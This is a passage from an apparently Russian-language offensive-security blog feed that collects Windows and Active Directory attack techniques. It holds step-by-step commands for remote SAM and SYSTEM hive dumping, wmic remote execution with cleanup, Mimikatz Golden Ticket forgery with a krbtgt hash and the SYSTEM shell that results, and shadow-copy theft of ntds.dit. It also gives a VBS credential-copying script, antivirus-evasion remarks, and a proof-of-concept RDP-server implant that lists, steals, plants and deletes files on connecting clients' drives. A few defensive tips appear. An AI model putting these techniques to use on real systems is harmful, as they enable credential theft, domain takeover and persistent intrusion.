2", "Маска подсети . . . . . . . . . . : 255.255.0.0", "Основной шлюз. . . . . .
. . . :", "Туннельный адаптер Teredo Tunneling Pseudo-Interface:", "Состояние с
реды. . . . . . . . : Среда передачи недоступна.", "Туннельный адаптер isatap.{8
6A92B92-E3DE-456B-9EDB-24B724A73E3E}:"};
Types = {1, 1, 1, 1, 1, 1, 1, 1, 1, 1};
};

C:\>wmic /node:RHOST /user:administrator /password:password process call create "cmd /c del /Q /F C:\Windows\Temp\cmd.out && reg delete HKLM\Software\temp /f"
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
ProcessId = 3716;
ReturnValue = 0;
};

C:\>

[hacking tricks] Тихий pwdump

noreply@blogger.com (Dmitry Evteev) — Wed, 26 Mar 2014 02:49:00 +0400

Каждый раз, когда необходимо выдрать локальную базу SAM с компутера под управлением окон, у тулов серии pwdump начинается истерика в предвестии реакции используемого авера на удаленной машине(( И этот процесс все чаще начинает походить на танцы с бубном вокруг когда-то девственного софта, не побывавшего в лаборатории дяди ммм... вирусного аналитика) Поэтому, дабы сэкономить время и нервы (юзверей) приходится отказываться от стороннего ПО и прибегать к использованию встроенных средств операционной системы :)

Про скрытые копии я уже говорил ранее. Этот способ отлично подходит для перетягивания содержимого адешечки. А вот для локальной базы SAM существуют и другие не менее простые варианты. Один из них представлен ниже.

net use \\RHOST\c$ /u:admin password
sc \\RHOST config RemoteRegistry start= demand
sc \\RHOST start RemoteRegistry
reg save \\RHOST\hklm\sam sam
reg save \\RHOST\hklm\system system
move \\RHOST\C$\Windows\System32\sam sam
move \\RHOST\C$\Windows\System32\system system
sc \\RHOST stop RemoteRegistry
sc \\RHOST config RemoteRegistry start= disabled
net use \\RHOST\c$ /del

После чего соответствующие файлы передаются понимающим их гуям [например].

[hacking tricks] Including password in runas command line

noreply@blogger.com (Dmitry Evteev) — Mon, 24 Mar 2014 03:36:00 +0400

Все пентестеры (и не только) эпизодически натыкаются на проблему, связанную с запуском локального процесса от имени другого пользователя из командной строки. К сожалению, поставляемая с виндой тулень runas не спасает т.к. в ней отсутствует возможность передачи пароля в качестве аргумента. Такой способ:

C:\Windows\System32> echo password | runas /u:user cmd

Увы, работал(ет) только на устаревших системах. Решение: использовать API функцию CreateProcessWithLogonW. Код ниже, бинарь тут (md5:424872148d3e84ed99cedd5bfbb8740c)

#include <windows.h>
#include <stdio.h>
#include <userenv.h>

void wmain(int argc, WCHAR *argv[])
{
    PROCESS_INFORMATION pi = {0};
    STARTUPINFO         si = {0};

    ZeroMemory( &si, sizeof(STARTUPINFO) );
    si.cb = sizeof(STARTUPINFO);
    si.dwFlags |= STARTF_USESHOWWINDOW;
 si.wShowWindow = SW_HIDE;
    si.cb = sizeof(STARTUPINFO);
    
    if (argc < 4)
    {
        wprintf(L"Usage: %s [user@domain] [password] [cmd]", argv[0]);
        wprintf(L"\nExample: %s adm@my.domain pass \"cmd /c ipconfig >C:\\\\tempdir\\\\output.txt\"", argv[0]);
        return;
 }
        wprintf(L"Executed: %s", argv[3]);
  wprintf(L"\n\n");
    if (!CreateProcessWithLogonW(argv[1], NULL, argv[2], 
  LOGON_WITH_PROFILE, NULL, argv[3], 
        CREATE_UNICODE_ENVIRONMENT, NULL, NULL, 
            &si, &pi)) wprintf(L"error");

    CloseHandle(pi.hProcess);
    CloseHandle(pi.hThread);
}

C:\Temp>runas.exe
Usage: runas.exe [user@domain] [password] [cmd]
Example: runas.exe adm@my.domain pass "cmd /c ipconfig >C:\\tempdir\\output.txt"

C:\Temp>whoami
test\admin

C:\Temp>runas.exe abc@test.local abc "cmd /c whoami >C:\\Temp\\t.txt"
Executed: cmd /c whoami >C:\\Temp\\t.txt

C:\Temp>type t.txt
test\abc

C:\Temp>

[hacking tricks] Mimikatz Golden Ticket

noreply@blogger.com (Dmitry Evteev) — Sun, 23 Mar 2014 01:52:00 +0400

Данная рубрика будет кратко освещать практические примеры реализации тех или иных атак без утомительно долгих вступлений о природе и погоде. Только суть. И в качестве первой заметки под этим тегом речь вновь зайдет о создании Golden Ticket. Так получилось, что Benjamin буквально на днях добавил кусок кода, отвечающий за идентификатор пользователя и список групп, участником которых становится счастливый обладатель золотого билета Kerberos. Этим и предлагаю пользоваться!

C:\Temp>whoami /USER

USER INFORMATION
----------------

User Name SID
=============== =============================================
test\domainuser S-1-5-21-3838653977-3010990090-570996099-1122

C:\Temp>PsExec.exe \\WIN-8D3KWV0CV4T.TEST.LOCAL -s cmd

PsExec v2.0 - Execute processes remotely
Copyright (C) 2001-2013 Mark Russinovich
Sysinternals - www.sysinternals.com

Couldn't access WIN-8D3KWV0CV4T.TEST.LOCAL:
Access is denied.

C:\Temp>net user newuser newpassword /add /domain
The request will be processed at a domain controller for domain test.local.

System error 5 has occurred.

Access is denied.

C:\Temp>mimikatz

.#####. mimikatz 2.0 alpha (x86) release "Kiwi en C" (Mar 17 2014 22:27:23)
.## ^ ##.
## / \ ## /* * *
## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
'## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo)
'#####' with 14 modules * * */

mimikatz # kerberos::golden /admin:Guest /domain:TEST.LOCAL /sid:S-1-5-21-3838653977-3010990090-570996099 /krbtgt:C1E209654807223D8CB17376FCB70E53 /ticket:ticket.krb /id:500 /groups:513,512,520,518,519
Admin : Guest
Domain : TEST.LOCAL
SID : S-1-5-21-3838653977-3010990090-570996099
User Id : 500
Groups Id : *513 512 520 518 519
krbtgt : c1e209654807223d8cb17376fcb70e53
-> Ticket : ticket.krb

* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated

Final Ticket Saved to file !

mimikatz # kerberos::purge
Ticket(s) purge for current session is OK

mimikatz # kerberos::ptt ticket.krb
Ticket 'ticket.krb' successfully submitted for current session

mimikatz # exit
Bye!

C:\Temp>net user newuser newpassword /add /domain
The request will be processed at a domain controller for domain test.local.

The command completed successfully.

C:\Temp>PsExec.exe \\WIN-8D3KWV0CV4T.TEST.LOCAL -s cmd

PsExec v2.0 - Execute processes remotely
Copyright (C) 2001-2013 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows [‚ҐабЁп 6.0.6001]
(C) Љ®аЇ®а жЁп Њ ©Єа®б®дв, 2006. ‚бҐ Їа ў § йЁйҐл.

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>

Yep! Another backdoor in Active Directory :: Mimikatz Golden Ticket

noreply@blogger.com (Dmitry Evteev) — Sat, 22 Mar 2014 05:56:00 +0400

В начале этого года Benjamin Delpy aka gentilkiwi вновь порадовал сообщество очередным исследованием и, как следствие, новым функционалом в своей эпической сборке под названием Mimikatz. Речь идет про использование архитектурных особенностей службы Kerberos в Microsoft Active Directory с целью скрытого сохранения привилегированного доступа над ресурсами домена. Чтобы понять всю ценность раскопок gentilkiwi, стоит освежить свои знания в контексте протокола Kerberos и о его месте в службе каталогов Microsoft.

Что мы помним про Kerberos? Из сухой теории по безопасности припоминается, что это какой-то сетевой протокол аутентификации, изначально спроектированный в недрах Массачусетского универа… это что-то болтающееся на контроллерах домена в виде открытого порта 88 и предназначенное для прозрачной авторизации к ресурсам домена. Это "нечто муторное", делающее жизнь администратора сети радостной и беззаботной...

(картинка дернута со страницы википедии)

Не залезая в дебри протокола, грубо говоря аутентификация в стиле Kerberos базируется на "билетах доступа". Для получения доступа к ресурсу клиент предоставляет свой билет доступа, а ресурс в свою очередь, на основе криптографической магии, верифицирует этот билет доступа и принимает решение, какими правами наделен клиент и наделен-ли он ими вообще. Особую роль во всем этом процессе занимают сервера аутентификации, которые отвечают за выдачу сакральных билетов доступа. В Microsoft Active Directory эту функцию выполняют контроллеры домена.

Начиная с Kerberos четвертой версии появляется такая полезная штука, как TGT (Ticket Granting Ticket — билет для получения билета). Именно эту версию протокола Kerberos штампует корпорация добра в свое решение для централизованного управления сетями, которое впоследствии получает название Microsoft Active Directory.

С первого взгляда все просто замечательно! Разве что повылезали косяки в реализации… Хотя у кого их не было? [тынц] Сейчас разумеется подобные баги пофикшены и сурьезные компании, которые срослись всеми частями своей ИТ-инфраструктуры с MS AD, могут вздохнуть с облегчением, но…

Копнем несколько глубже в устройство Майкрософт Kerberos и окажется, что вся пирамида с билетами доступа строится на основе одного пользователя – krbtgt, а еще точнее, вся криптомагия с билетами завязана на NTLM-хеш этого пользователя. То есть, счастливый обладатель правильной 32-х битной последовательностью символов получает безграничные привилегии ко всем имеющимся в домене ресурсам т.к. способен выписывать билеты Kerberos с любым уровнем доступа. И это не является уязвимостью! Так устроен протокол аутентификации Kerberos.

А теперь задумаемся, как часто этот основополагающий "секрет" (пароль пользователя krbtgt) меняют? Смешно, но ни у одной известной мне компании в регламентах по безопасности не встречается упоминания про смену пароля пользователю krbtgt. То есть, самый важный "ключ" к Active Directory, с помощью которого происходит отруливание всей авторизацией к информационным ресурсам предприятия создается единожды (при создании нового домена) и не меняется на протяжении всего времени его существования.

На это собственно и обратил внимание gentilkiwi, что побудило его запилить новый функционал в Mimikatz. Так появилась функция генерации условно бессрочного TGT билета, выписанного на идентификатор встроенного администратора системы (SID 500). Прелесть этого TGT билета в том, что даже при условии, когда используемая учетная запись будет заблокирована или отключена, аутентификация по Kerberos будет работать! Отсутствие возможности использовать дополнительных условий ограничения доступа в отношении встроенной учетной записи администратора с SID 500 такие, например, как ограничение доступа по времени, открывают отличные перспективы для атакующего. Кроме того, для подгрузки TGT билета в адресное пространство операционной системы не требуется высоких привилегий администратора или системы, достаточно обычных прав доменного пользователя. Для создания волшебного билета Kerberos, открывающего все двери к ресурсам домена, потребуется увести используемый NTLM-хеш пользователя krbtgt.

«Трудно быть Богом, но кто-то же должен им быть…» (с)

Итак, для полной концепции Бога в адешечке нам понадобится:

NTLM-хеш пользователя krbtgt
Имя-домена и его SID
Компутер под управлением Windows, являющийся участником целевого домена

Для выполнения первого условия необходимо либо наличие актуальной резервной копии Active Directory, либо соответствующие права в домене, позволяющие сделать такую копию [ссылка]. Как вариант это можно провернуть с использованием того-же Mimikatz:

mimikatz.exe "privilege::debug" "lsadump::samrpc /patch" exit

Второе условие выполняется при наличии минимального доступа к домену. SID-домена можно получить, например, как предлагает автор одноименной публикации, через whoami или PsGetsid из состава Sysinternals:

Последнее условие необходимо только в момент использования шитых мимакадзом привилегий. Генерация самого TGT билета может протекать где угодно.

mimikatz.exe "kerberos::golden /admin:ANYID /domain:TEST.LOCAL /sid:S-1-5-21-3838653977-3010990090-570996099 /krbtgt:C1E209654807223D8CB17376FCB70E53 /ticket:myfile" exit

kerberos::golden – вызов функции генерации TGT билета
/admin:ANYID – сюда можно писать произвольный идентификатор (будет светиться в журнале безопасности)
/domain:TEST.LOCAL – целевой домен
/sid:S-1-5-21-3838653977-3010990090-570996099 – идентификатор целевого домена
/krbtgt:C1E209654807223D8CB17376FCB70E53 – NTLM-хеш пользователя krbtgt
/ticket:myfile – имя файла, в который будет записан новоиспеченный TGT билет

После генерации этого файла возвращаемся к доменному компьютеру и подгружаем волшебный "золотой билетик" Kerberos:

mimikatz.exe "kerberos::ptt myfile" exit

Ну и не стоит забывать, что аутентификация по протоколу Kerberos завязана на использование полных DNS-имен, поэтому голые ip-адреса придется забыть.

В готовой сборке Mimikatz владелец золотого TGT билета становится участником следующих групп безопасности:

SID 512 - Администраторы домена
SID 513 - Пользователи домена
SID 518 - Администраторы схемы
SID 519 - Администраторы предприятия
SID 520 - Владельцы-создатели групповой политики

, а также получает маркер доступа встроенной учетной записи администратора системы (SID 500). К сожалению, в реальной жизни этого не всегда хватает. Например, для случаев, когда необходимо аккуратно тыкнуться на определенный ресурс (например, на файловый сервер) без внесения каких-либо изменений в систему. Да-да, смена владельца с последующим сбросом ACL (и последующим ее восстановлением) на киллограмовой папочке только для того, чтобы убедиться в отсутствии файликов с паролями в плейн тексте, изрядно напрягает.

В подобных случаях можно собрать свою версию Mimikatz (благо имеются сорцы в свободном доступе с подробным руководством по сборке). Самые же ленивые могут забрать готовую дополненную версию в части генерации TGT билета отсюда (mimi.exe/md5 324ac76502379a869485f7a404dd1570). В ней появились два новых параметра:

/usersid – собсно SID пользователя
/groupsid – участником какой группы необходимо быть (помимо администраторов домена, предприятий и пр.)

Предположим мы хотим получить доступ к каталогу "only_test01", как показано на рисунке выше. Для этого заглядываем в список контроля доступа удаленного ресурса (eq ShareEnum), получаем SID целевой группы (eq PsGetsid) и создаем себе условия легитимного доступа:

mimi.exe "kerberos::golden /admin:ANONYMOUS /domain:TEST.LOCAL /sid:S-1-5-21-3838653977-3010990090-570996099 /krbtgt:C1E209654807223D8CB17376FCB70E53 /ticket:myfile2 /usersid:501 /groupsid:1120" exit

mimi.exe "kerberos::ptt myfile2" exit

И вуаля!11

Как защититься?

Согласитесь, с точки зрения форенсики забавная штука получается :)) Отмониторить активность атакующего, суметь отделить ее от активности настоящих легитимных пользователей и сервисных учетных записей при подобных возможностях, будет ох как непросто, если вообще возможно. А вот предотвратить (повторный) несанкционированный доступ можно путем смены пароля пользователю krbtgt. Причем менять пароль необходимо два раза подряд (еще одна тонкая особенность krbtgt), затем передергивать службу KDC и наблюдать как (временно или насовсем) отваливаются сервисы, завязанные на Active Directory… итак до следующего случая компрометации хешика krbtgt :) Удачи!

Windows shadow hack

noreply@blogger.com (Dmitry Evteev) — Wed, 18 Sep 2013 02:10:00 +0400

Потихоньку проходят времена, когда можно было беспрепятственно шнырять fgdump'ом по всей сети. Сейчас же на каждой корпоративной рабочей станции установлен грозный антивирус, который палит всякие полезные программки, называя их как-то созвучно со словом "hack". В довесок, наблюдается грустная тенденция по инсталляции аверов для защиты серверов все чаще и чаще :(( ...

Убить всяких касперов по-простому, к сожалению, не всегда удается. Поэтому тру-парни пользуют либо собственные сборки fgdump'ов, перекриптованные собственными пакерами, либо ищут альтернативные пути доступа к хешикам пользователей скомпрометированных систем. Про альтернативные методы дерганья нужных данных как раз и пойдет речь в данной публикации.

Первое, что приходит в голову - это воспользоваться встроенными механизмами резервного копирования операционной системы вындовс. Для серверов и рабочих станций справедлива следующая команда:

ntbackup backup systemstate /F "C:\backup.bkf"

и

wbadmin start systemstatebackup -backupTarget:D: -quiet
(для более старших осей)

В данном случае мы получаем system state, который после переброса на компьютер атакующего, необходимо развернуть в тестовой среде. Затем, для получения доступа к свежей копии продуктивной вражеской системы, можно воспользоваться, например, ElcomSoft System Recovery.

Я люблю данный способ, потому как он позволяет в спокойной обстановке изучить систему с использованием привычных интерфейсов без страха неожиданно потерять к ним доступ. Это особенно выгодно, когда речь заходит про копию контроллера домена. Однако у данного подхода существует и серьезное ограничение, связанное с размером файла резервной копии. Для небольшого домена размер файла резервной копии может достигать нескольких гигабайт. Поэтому в ситуевине, когда атакующий ограничен шириной канала, такой вариант, увы, не подходит.

Другой альтернативой достижения аналогичных целей является функция "скрытого копирования" (shadow copy), которая впервые появилась в Windows 2003. Для контроллера домена типовая атака состоит из следующих шагов (см. ссылку):

1. Получаем слепок целевой системы

vssadmin create shadow /for=C:

2. Копируем необходимые файлы

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\ System32\config\SYSTEM system.file

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\ NTDS\NTDS.dit ntdsdit.file

Прим. Файл "system" хранит в себе syskey, который требуется для доступа к чувствительным данным, содержащимся в файле "ntds.dit". Файл "ntds.dit" - это реплика каталога домена.

3. После перемещения этих двух файлов в собственную среду, можно поколдовать над ними с использованием NTDSXtract framework (см. также ссылку).

4. Грепаем хешики и запускаем перебор паролей

Прим. Стоит помнить, что на случай не брутабельных паролей, атакующего может выручить атака pass-the-hash. Это справедливо и в случае, когда на контроллере домена задействована настройка не хранить lm-хеш после смены пароля пользователем.

С контроллером домена все норм, а вот на рабочих станциях волшебство из командной строки заканчивается. Дело в том, что парни из MS делают все возможное, чтобы максимально разнообразить жизнь суровым сисадминам и тем, кто ими становится после эксплуатации соответствующих уязвимостей на операционных системах, предназначенных для офисного планктона. Ограничивают доступ к системе по RDP в одну сессию, не ставят по умолчанию telnet в последних сборках винды, подсовывают урезанную версию vssadmin, которая не умеет делать новые копии состояния файловой системы. Но выход есть! Все аналогичные действия можно провернуть через WMI.

...
Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
Set objShadowStorage = objWMIService.Get("Win32_ShadowCopy")
errResult = objShadowStorage.Create("C:\", "ClientAccessible", strShadowID)
...

Так был написан наколенный вариант vbs-скрипта для скрытого резервного копирования нужных файлов:

Dim filescopy,filenames
filescopy = Array("\Windows\System32\config\system","\Windows\System32\config\sam","\Windows\NTDS\ntds.dit")

set fso=CreateObject("Scripting.FileSystemObject")
set objNetwork = CreateObject("WScript.Network")
Set WShell = CreateObject("WScript.Shell")

tmpdir = fso.GetTempName
CurrentDirectory = fso.GetAbsolutePathName(".")

Set objArgs = WScript.Arguments
if WScript.Arguments.Count = 3 then
    WScript.Echo "Server: " & objArgs(0)
    WScript.Echo "User: " & objArgs(1)
    WScript.Echo "Password: " & objArgs(2)
    Set objSWbemLocator = CreateObject("WbemScripting.SWbemLocator")
    Set objWMIService = objSWbemLocator.ConnectServer(objArgs(0), "root\cimv2", objArgs(1), objArgs(2))
    srv = objArgs(0)
else
    WScript.Echo "Server: localhost"
    Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
    srv = "127.0.0.1"
end if

Set objShadowStorage = objWMIService.Get("Win32_ShadowCopy")
errResult = objShadowStorage.Create("C:\", "ClientAccessible", strShadowID)

Set colItems = objWMIService.ExecQuery("Select DeviceObject from Win32_ShadowCopy where ID='" & strShadowID & "'")
For Each objItem in colItems
 strDeviceObject = objItem.DeviceObject
Next

Set objStartup = objWMIService.Get("Win32_ProcessStartup") 
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = 12
set objProcess=objWMIService.Get("Win32_Process")

errResult = objProcess.Create("cmd /c mkdir %windir%\Temp\" & tmpdir,Null,objConfig,intProcessID)
For Each val In filescopy
 errResult = objProcess.Create("cmd /c copy " & strDeviceObject & val & " %windir%\Temp\" & tmpdir,Null,objConfig,intProcessID)
 Call ProcMon(intProcessID)
Next

if srv = "127.0.0.1" Then
 WShell.run("cmd /c move /Y %windir%\Temp\" & tmpdir & " " & CurrentDirectory & "\127.0.0.1"), 0, true
Else
 WShell.run("cmd /c net use \\" & srv & "\ADMIN$ " & objArgs(2) & " /u:" & objArgs(1) & " && mkdir " & CurrentDirectory & "\" & srv & " && copy /Y \\" & srv & "\ADMIN$\Temp\" & tmpdir & "\* " & CurrentDirectory & "\" & srv & "\ && rmdir /S /Q \\" & srv & "\ADMIN$\Temp\" & tmpdir & " && net use \\" & srv & "\ADMIN$ /del"), 0, true
End if

Function ProcMon(intProcessID)
    Dim colProcesses, ExitFlag
    Set colProcesses = objWMIService.ExecNotificationQuery("SELECT * FROM __InstanceDeletionEvent WITHIN 1 WHERE TargetInstance ISA 'Win32_Process'")
    Do Until ExitFlag
 Set objLatestProcess = colProcesses.NextEvent
     If objLatestProcess.TargetInstance.ProcessID = intProcessID Then ExitFlag = true  
    Loop    
End Function

Пример выполнения:

На этом сегодня все. Не попадайтесь!

Cт(а)ра(да)ние админов в недрах sysvol

noreply@blogger.com (Dmitry Evteev) — Fri, 6 Sep 2013 01:00:00 +0400

Когда компания Microsoft реализовала централизованную систему авторизации и явила всему миру Active Directory, каждый уважающий себя системный администратор принялся выдумывать способы максимально простого управления всей инфраструктурой на базе этой балалайки. Одна из задач, которую ставил перед собой админ - сохранить власть над всеми компутерами домена и иметь возможность демонстрировать эту власть не покидая своего отдаленного уютного логова заваленного пивом и снеками. Продвинутым пользователям в свою очередь это очень не нравилось. Ведь не бритый и всегда злой программист, обладая правами администратора к их системам, мог получить доступ к самой ценной информации, которая только может обрабатываться на корпоративном компьютере - к переписке в icq! Поэтому продвинутые пользователи всячески препятствовали сохранению админом высоких привилегий на своих системах.

прим. В то время (начало 2000 года) для многих админов была целая проблема запустить все необходимые программулины с правами непривилегированного юзверя. Потому каждый первый юзверь был локальным администратором на своем компьютере.

Сопротивление удаленному контролю со стороны продвинутых пользователей на своих рабочих станциях в корне не устраивало властелинов сети. Почесав слегка затылок в каталоге sysvol появляются файлы с расширением "bat" приблизительно следующего содержимого:

net localgroup administrators "domain\domain admins" /add

, которые будучи помещенные в автозагрузку компьютеров через gpo ненадолго выравнивали силы противодействующих сторон.

Прошло совсем немного времени и администраторы встретились с огромной проблемой - это был локальный администратор на каждом доменном компьютере. Удалить его низя, значит учетка нужная. Кроме того, ей всегда можно воспользоваться в случае, если компутер потеряет домен в силу различных обстоятельств, рассуждали админы. Порассуждали и заб(ы)или.

Но задвинуть надолго эту проблему в компаниях, где навязывалась "информационная безопасность" с регулярной сменой паролей или наблюдалась текучесть кадров в ит-отделе, не удавалось. А если к этому еще вспомнить насущие проблемы в виде нескольких версий unattended-инсталляций с различными паролями, выявленные случаи смены паролей корпоративными юзверями и несколько версий дефолтов в голове админа.....

Таким образом, у самых сообразительных админов, которые привыкли решать проблемы топорно в режиме неопределенного времени, среди многочисленных костылей в виде bat-файлов появляется нечто новое в cmd-обертке:

net user administrator password1

Задача файла аналогична предыдущему решению - запуститься на всех рабочих станциях домена с правами системы и установить хардкоженный пароль. Разумеется такой способ ротации пароля локального администратора кажется диким, однако ваш покорный слуга даже сегодня встречает подобное творчество в крупных гетерогенных сетях.

В то же самое время ребята из компании Microsoft хрустя попкорном с интересом наблюдали за всей этой движухой со стороны. Все понимали, что админы очень ~~охотно~~ активно используют logon/logoff сценарии в домене. Однако, функций командной строки явно не хватало для реализации всех многочисленных идей, которые рождались в светлых головах системных администраторов. Так, мир увидел WSH, который тут же был окучен сисадминами.

Каталог sysvol запестрил расширениями vbs и js вперемешку с уже историческими костылями командной строки. Новые технологии позволили администраторам "по новому" заняться старыми проблемами, в т.ч. и с пресловутым локальным администратором...

strComputer = "."
Set objUser = GetObject("WinNT://" & strComputer & "/Administrator, user")
objUser.SetPassword "password1"
objUser.SetInfo

На сцене появляются суровые админы, которые считают подобные методы ротации пароля администратора небезопасными. Но шутники корпорации добра предлагают иллюзию безопасности кода сценариев и релизят тулень под названием Script Encoder, которая "шифрует" содержимое сценариев vbs/js. Администраторы успокаиваются и все счастливы. Особенно счастливы зохеры, которые декодируют содержимое скриптов на раз.

Но шутникам из MS этого показалось мало. А потому в windows server 2008 появляется возможность "безопасной" ротации паролей локальных пользователей домена, прям из интерфейса управления групповыми политиками:

Админы пользуют, а зохеры тырят group.xml из каталога sysvol и пользуют локальных админов :) Как-то так и живем.

Источник: http://obscuresecurity.blogspot.ru/2012/05/gpp-password-retrieval-with-powershell.html

Эпилог

В данном рассказе я не хотел кого-то обидеть! И в первую очередь, не хотел обидеть системных администраторов, многие из которых действительно хорошо делают свою работу. Цель публикации в очередной раз обратить внимание администраторов и специалистов по ИБ на то, что хранение паролей в открытом виде опасно! И этим не брезгают пользоваться атакующие. А предлагаемые пути сокрытия пароля от ms при его хранении лишь вызывают широкую улыбку.

Что же касается локального администратора в доменной инфраструктуре, то в очередной раз хочу обратить внимание уважаемого читателя на следующую публикацию: http://support.microsoft.com/kb/814777 Отключите локального администратора на компьютерах домена и безопасность вашей сети немного повысится.

Охота на администраторов сети

noreply@blogger.com (Dmitry Evteev) — Thu, 8 Aug 2013 00:42:00 +0400

Рабочая станция любого среднестатистического повелителя сети (или повелителя отдельной ее части) является наиболее ценным и лакомым ресурсом для атакующего. Тут вам и резервные копии конфигураций продуктивных систем, и красочная топология сети с указанием наиболее ценных ресурсов, и, разумеется, заветные логины, ключики и пароли. Прям подарочная не зашифрованная коробка, перевязанная бантиком 8)) Если добавить сюда еще и "скромные" разрешающие правила фильтрации трафика на границах сетей с козырных ip адресов админов, тогда можно понять насколько сильно атакующий жаждет заполучить доступ к этим системам. Это отличный плацдарм для планирования и развития атаки!

Но как же добраться до компутера админа и вместе с тем заполучить ключи от всех дверей? Существует довольно много способов. Об одном из них речь пойдет в данной публикации.

Представьте себе ситуацию, когда большинство попыток реализации атак не увенчались успехом. При этом в распоряжении атакующего оказались лишь несколько тестовых автономных серверов без каких либо ценностей на них (пароли дефолты и т.п.), пускай в т.ч., расположенные в изолированном сегменте за семью файрволами и пятью айпиэсами. Что из этого можно выжать?

Когда речь заходит про удаленный доступ к машинкам на платформе windows, то чаще всего прибегают к встроенному функционалу операционной системы - использованию протокола RDP. А когда возникает потребность в передаче файлов небольшого размера, то разумеется задействуют следующую функцию rdp-клиента:

(прим., в более поздних реализациях клиента была добавлена возможность выбора конкретных дисков для подключения)

Тут-то и кроется опасность, о которой предупреждает сам rdp-клиент. Тем не менее все администраторы зачастую не обращают на это уже изрядно поднадоевшее сообщение безопасности никакого внимания (так ведь действительно проще, удобнее и быстрее!).

Теперь я думаю всем стало понятно про предлагаемый мною сценарий атаки. Соглашаясь на подключение к недоверенному rdp-серверу с торчащими дисками C:\ можно лишиться чувствительных данных, подцепить meterpreter (или чего еще более живучее), поймать del * /f /s /q.

В качестве демонстрации этого привожу proof-of-concept, который будучи заброшенный в автозагрузку при подключении терминальных пользователей на скомпрометированном сервере позволяет работать с локальными и сетевыми дисками клиента.

Настраиваемые переменные
tFolder - задает путь к рабочему каталогу на терминальном сервере
sleep - задает время задержки между обработкой новых команд

Поддерживаемые команды

Чтобы отправить команду, необходимо воспользоваться файлом "cmd.txt". Каждая строка в этом файле воспринимается, как отдельная команда, что позволяет задавать одновременно более одной команды. Для каждого терминального клиента создается свой уникальный каталог по имени rdp-подключения (RDP-Tcp#<порядковый номер>) и свой "cmd.txt" файл соответственно. Копирование и загрузка файлов производится для каждого терминального клиента в его индивидуальном каталоге.

ls:<путь до каталога>
Листинг файлов и директорий. Пример:
ls:\\TSCLIENT\C
...
>ls \\TSCLIENT\C
<DIR> Documents and Settings
<DIR> Program Files
<DIR> RECYCLER
<DIR> System Volume Information
<DIR> Temp
<DIR> WINDOWS
<DIR> wmpub
AUTOEXEC.BAT
boot.ini
bootfont.bin
CONFIG.SYS
IO.SYS
MSDOS.SYS
NTDETECT.COM
ntldr
pagefile.sys
...

ll:<путь до каталога>
Рекурсивный листинг файлов и директорий. Пример:
ll:\\TSCLIENT\C\Temp
...
>ll \\TSCLIENT\C\Temp
<DIR> RDP-Tcp#2
<DIR> RDP-Tcp#3

>ls \\tsclient\c\Temp\RDP-Tcp#2
cmd.txt
list.txt

>ls \\tsclient\c\Temp\RDP-Tcp#3
cmd.txt
list.txt
...

get:<путь до каталога или файла>
Копирует файл или каталог в рабочую директорию из которой выполнялась команда. Пример:
get:\\TSCLIENT\C\Windows\repair

put:<имя файла для отправки>:<путь до каталога назначения>
Копирует файл, расположенный в рабочей директории, из которой выполнялась команда в каталог назначения. Пример:
put:meterpreter.vbs:\\TSCLIENT\C\Windows\System32\wbem\mof

rm:<путь до удаляемого файла>
Удаляет указанный файл. Пример:
rm:\\TSCLIENT\C\myfile

On Error resume next

tFolder = "C:\Temp"
sleep = 5000

' - - - -

Set wshShell = CreateObject( "WScript.Shell" )
Set fso = CreateObject("Scripting.FileSystemObject")

rdpsession = wshShell.ExpandEnvironmentStrings("%SESSIONNAME%")
username = wshShell.ExpandEnvironmentStrings("%USERNAME%")

tFolder = tFolder & "\" & rdpsession

If Not fso.FolderExists(tFolder) Then
 fso.CreateFolder tFolder
End If

Set file = fso.CreateTextFile(tFolder&"\list.txt", True)
Set cmd = fso.CreateTextFile(tFolder&"\cmd.txt", True)
cmd.Close
file.WriteLine("Username: " & username)
file.WriteLine("")

With WScript.CreateObject("WScript.Network").EnumNetworkDrives()
 For i = 0 to .Count - 1 Step 2
  UNCpath = .Item(i + 1)
  file.WriteLine("UNC path: " & UNCpath)
  If UNCpath <> "" Then
   ShowFiles UNCpath,0
   file.WriteLine("")
  End If
 Next
End With

do
 Wscript.sleep(sleep)
 set objFile = fso.GetFile(tFolder&"\cmd.txt")
 If objFile.Size > 0 Then
  Set dict = CreateObject("Scripting.Dictionary")
  Set cmd = fso.OpenTextFile (tFolder&"\cmd.txt", 1)
  row = 0
  Do Until cmd.AtEndOfStream
   line = cmd.Readline
   dict.Add row, line
   row = row + 1
  Loop
 cmd.Close

For Each line in dict.Items
  command = UCase(mid(line,1,3))
  If command = "LS:" Then
   lspath = mid(line,4)
   file.WriteLine(">ls " & lspath)
   ShowFiles lspath,0
   file.WriteLine("")
  ElseIf command = "LL:" Then
   lspath = mid(line,4)
   file.WriteLine(">ll " & lspath)
   ShowFiles lspath,1
   file.WriteLine("")
  ElseIf command = "GET" Then
   getpath = mid(line,5)
   If fso.FileExists(getpath) Then
    fso.CopyFile getpath, tFolder&"\"
   ElseIf fso.FolderExists(getpath) Then
    fso.CopyFolder getpath, tFolder&"\"
   End If
   file.WriteLine(">get "&getpath)
   file.WriteLine("") 
  ElseIf command = "PUT" Then
   t1 = mid(line,5)
   s1 = InStr(1,t1,":")
   filein = mid(t1,1,s1-1)
   dirout = mid(t1,s1+1)
   If fso.FileExists(tFolder&"\"&filein) AND fso.FolderExists(dirout) Then
    fso.CopyFile tFolder&"\"&filein, dirout&"\"
   End If
   file.WriteLine(">put "&tFolder&"\"&filein&" "&dirout&"\")
   file.WriteLine("") 
  ElseIf command = "RM:" Then
   rmpath = mid(line,4)
   If fso.FileExists(rmpath) Then
    fso.DeleteFile rmpath
   End If
   file.WriteLine(">rm "&rmpath)
   file.WriteLine("") 
  End If
 Next

Set cmd = fso.CreateTextFile(tFolder&"\cmd.txt", True)
 cmd.Close

End If
loop

file.Close

Sub ShowFiles(Folder,ll)
 On Error resume next
 Dim fso, ObjFolder, ObjOutFile, ObjSubFolders, ObjSubFolder, ObjFiles

